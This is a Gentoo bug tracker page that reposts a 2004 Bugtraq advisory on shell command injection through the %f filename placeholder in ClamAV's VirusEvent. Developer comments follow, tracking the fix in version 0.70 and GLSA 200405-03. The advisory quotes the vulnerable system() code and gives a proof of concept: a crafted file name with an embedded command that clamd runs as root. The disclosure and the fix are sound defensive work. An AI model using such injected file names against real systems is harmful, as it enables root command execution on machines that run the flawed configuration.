Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 46264 - net-mail/clamav: NEVER use "%f" in your "VirusEvent"
Summary: net-mail/clamav: NEVER use "%f" in your "VirusEvent"
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: GLSA Errors (show other bugs)
Hardware: All Linux
: High normal (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2004-03-30 10:50 UTC by Tobias Weisserth
Modified: 2004-09-22 21:46 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---
koon: Assigned_To? (koon)


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tobias Weisserth 2004-03-30 10:50:35 UTC
Rene <l0om@excluded.org> posted this on bugtraq

date: 30 March 2004
product: clam antivirus
author: l0om  -  l0om[at]excluded.org  -  www.excluded.org

#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot of features and its easy to handle.
for normal you start it from the command line on demand but if you use the the dazuko module you can also scan in realtime. the program runs 
on standard as root but you can drop its privileges if you want to.

in the clamav.conf we can find the "VirusEvent" direction (which is on default disabled):


# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"

"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
 
this is not enough. they should del this "%f" feature for security reasons because in my opinion, for now, you nearly
cant prevent the "%f" thing from breaking out of your VirusEvent and do whatever the attacker likes too.

#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct *copt)
{
 [...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
        strcat(buffer, pt);             <----
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);

    /* WARNING: this is uninterruptable ! */
    system(cmd);   <------------------------------------------
    free(cmd);
}
#####################################################################

as we can see in the source code there is no filter for shell characters like ";" or " in the program.
therefor an attacker may take a look at your VirusEvent(as your clamav.conf is world-readable) and create a file named  " ; chmod 777 etc" for example and
put some virus in it. as we can see above the clamd will execute the buffer. The attacker cant use pathes like "/" but he has what it takes to get root or kill
the system.

the commands will be executed by the clamd on "/" as the process makes a chdir("/").

#####################################################################
example:

l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r--    1 root     root         6863 2004-03-27 11:27 /usr/local/etc/clamav.conf

l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin@network.net

# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]

l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

l0om:~> ls
 "; mkdir owned; echo "  XXX.blow_balls_4_real.mpeg   XxX.admin_and_amanda_backup_deamon_having_fun.avi

# on realtime scanning the file will be scaned when we close it or we open it for reading.
# [...whatever- on next virus scan]

l0om:~> ls -ld /owned
drwxrwxrwx    2 root     root           48 2004-03-30 11:29 owned
#####################################################################

workaround:
- dont use the VirusEvent
- dont use the "%f" in the VirusEvent(!)
- start events with your own script parsing the clamd
Comment 1 Tobias Weisserth 2004-03-30 10:50:35 UTC
Rene <l0om@excluded.org> posted this on bugtraq

date: 30 March 2004
product: clam antivirus
author: l0om  -  l0om[at]excluded.org  -  www.excluded.org

#####################################################################
clam antivirus is a antivirus program (which works very well). it comes with a lot of features and its easy to handle.
for normal you start it from the command line on demand but if you use the the dazuko module you can also scan in realtime. the program runs 
on standard as root but you can drop its privileges if you want to.

in the clamav.conf we can find the "VirusEvent" direction (which is on default disabled):


# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
# VirusEvent /usr/bin/send_sms 1214131 "VIRUS DETECTED: %f: %v"

"Make sure the virus event command cannot be exploited,
eg. by using some special file name when %f is used."
 
this is not enough. they should del this "%f" feature for security reasons because in my opinion, for now, you nearly
cant prevent the "%f" thing from breaking out of your VirusEvent and do whatever the attacker likes too.

#####################################################################
void virusaction(const char *filename, const char *virname, const struct cfgstruct *copt)
{
 [...]
    buffer = (char *) mcalloc(strlen(cmd) + strlen(filename) + strlen(virname) + 10, sizeof(char));

    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
    if((pt = strstr(cmd, "%f"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);            <----
        strcat(buffer, filename);       <----
        strcat(buffer, pt);             <----
        free(cmd);
        cmd = strdup(buffer);
    }

    if((pt = strstr(cmd, "%v"))) {
        *pt = 0; pt += 2;
        strcpy(buffer, cmd);
        strcat(buffer, virname);
        strcat(buffer, pt);
        free(cmd);
        cmd = strdup(buffer);
    }

    free(buffer);

    /* WARNING: this is uninterruptable ! */
    system(cmd);   <------------------------------------------
    free(cmd);
}
#####################################################################

as we can see in the source code there is no filter for shell characters like ";" or " in the program.
therefor an attacker may take a look at your VirusEvent(as your clamav.conf is world-readable) and create a file named  " ; chmod 777 etc" for example and
put some virus in it. as we can see above the clamd will execute the buffer. The attacker cant use pathes like "/" but he has what it takes to get root or kill
the system.

the commands will be executed by the clamd on "/" as the process makes a chdir("/").

#####################################################################
example:

l0om:~> ls -l /usr/local/etc/clamav.conf
-rw-r--r--    1 root     root         6863 2004-03-27 11:27 /usr/local/etc/clamav.conf

l0om:~> cat /usr/local/etc/clamav.conf
[...]
# Execute a command when virus is found. In the command string %v and %f will
# be replaced by the virus name and the infected file name respectively.
#
# SECURITY WARNING: Make sure the virus event command cannot be exploited,
#                   eg. by using some special file name when %f is used.
#                   Always use a full path to the command.
#                   Never delete/move files with this directive !
VirusEvent /bin/echo "Virus: %f: %v" | /usr/bin/mail -s "VIRUS ALERT" admin@network.net

# Run as selected user (clamd must be started by root).
# By default it doesn't drop privileges.
#User clamav
[...]

l0om:~> cat >" \"; mkdir owned; echo \""
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

l0om:~> ls
 "; mkdir owned; echo "  XXX.blow_balls_4_real.mpeg   XxX.admin_and_amanda_backup_deamon_having_fun.avi

# on realtime scanning the file will be scaned when we close it or we open it for reading.
# [...whatever- on next virus scan]

l0om:~> ls -ld /owned
drwxrwxrwx    2 root     root           48 2004-03-30 11:29 owned
#####################################################################

workaround:
- dont use the VirusEvent
- dont use the "%f" in the VirusEvent(!)
- start events with your own script parsing the clamds log file manual
######################################################################

have phun everybody!
   someone on NoFX concert or on the deconstruction-tour in köln?  PARTY ON!

-- l0om
-- www.excluded.org


Reproducible: Always
Steps to Reproduce:




I suggest to put a note into the ebuild that is displayed after emerging clamav,
warning to use the feature since it is VERY risky indeed. According to the
advisory, the VirusEvent isn't used by default.

Maybe this is going to be fixed in a later version of clamav. We should leave
the bug open until the issue is fixed by the clamav developers. An open security
bug is a nice reference and documentation of this issue to Gentoo clamav users.

regards,
Tobias W.
Comment 2 Kurt Lieber (RETIRED) gentoo-dev 2004-04-07 11:19:43 UTC
lordvan -- comments?
Comment 3 Thierry Carrez (RETIRED) gentoo-dev 2004-04-13 03:23:45 UTC
Still waiting for upstream and/or confirmation, apparently they tried to fix a lot of sprintf recently but backed out the patch. Note sure they know about this one precisely.

Maybe we should just patch the current one with a comment warning against the use of %f in VirusEvent in the clamav.conf file ?

-K
Comment 4 Thierry Carrez (RETIRED) gentoo-dev 2004-04-22 04:50:47 UTC
v0.70 released - drops %f support in VirusEvent.
ebuild is already in portage, we just need it stable.

Given the low priority of this bug, we can wait a little before asking arches to review ?

-K
Comment 5 Thierry Carrez (RETIRED) gentoo-dev 2004-04-29 07:19:29 UTC
We need stable for the net-mail/clamav-0.70 ebuild : arches, please test.
-K
Comment 6 Andrea Barisani (RETIRED) gentoo-dev 2004-04-29 07:26:02 UTC
net-mail/clamav-0.70 works fine for me on x86
Comment 7 Thomas Raschbacher gentoo-dev 2004-04-29 12:37:28 UTC
same here. use it for quite a while now.
i'll mark stable x86
other archs plz test and mark stable yourselfs.

regards
Comment 8 Guy Martin (RETIRED) gentoo-dev 2004-04-29 12:43:56 UTC
Stable on hppa.
Comment 9 Jason Wever (RETIRED) gentoo-dev 2004-04-29 20:05:25 UTC
Stable on sparc.
Comment 10 Bryan Østergaard (RETIRED) gentoo-dev 2004-04-29 23:35:28 UTC
Stable on alpha.
Comment 11 Jason Huebel (RETIRED) gentoo-dev 2004-04-30 15:37:24 UTC
stable on amd64
Comment 12 Thierry Carrez (RETIRED) gentoo-dev 2004-05-04 07:06:15 UTC
Still needing ppc stable for GLSA.
-K
Comment 13 Luca Barbato gentoo-dev 2004-05-04 11:13:48 UTC
marked ppc, luckly I found a user willing to test it
Comment 14 Thierry Carrez (RETIRED) gentoo-dev 2004-05-04 11:43:53 UTC
Thanks Luca,
Ready for a GLSA publication decision then...
Comment 15 Thierry Carrez (RETIRED) gentoo-dev 2004-05-11 12:37:58 UTC
GLSA 200405-03